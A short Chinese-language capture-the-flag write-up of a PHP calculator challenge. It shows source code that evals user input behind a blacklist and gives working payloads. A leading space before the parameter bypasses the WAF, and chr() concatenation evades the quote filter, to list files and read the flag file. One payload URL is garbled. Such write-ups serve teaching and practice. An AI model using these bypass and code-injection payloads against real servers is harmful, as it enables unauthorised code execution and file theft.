进去是一个计算机界面,很大感觉是ssti模板注入(然而并不是)
看js代码,在/calc.php处理数据
代码:
<?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } eval('echo '.$str.';'); } ?>
这里是个命令执行,要绕过黑名单
这样修饰符号/m是指多行匹配:使边界字符 ^ 和 $ 匹配每一行的开头和结尾,记住是多行,而不是整个字符串的开头和结尾。
这里看黑名单可以发现,其实它并没有过滤很多。但是随意输入一个phpinfo()
发现显示forbidden,经过测试发现字母全都被过滤了
这里利用php的字符串解析特性的一个漏洞:链接
具体就是在num前面加个空格
这里试了一下发现system貌似用不了,那就用php自带的函数吧
这里开始准备是用pirnt_r(glob('*'))
但是发现单引号被过滤了,这里用chr(42)代替(就是*),这样可以不用单引号
? num=http://node4.buuoj.cn:28620/calc.php?%20num=print_r(glob(chr(42)));
根目录发现flag
直接print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));
过滤了单引号,不好传入字符串,用chr拼凑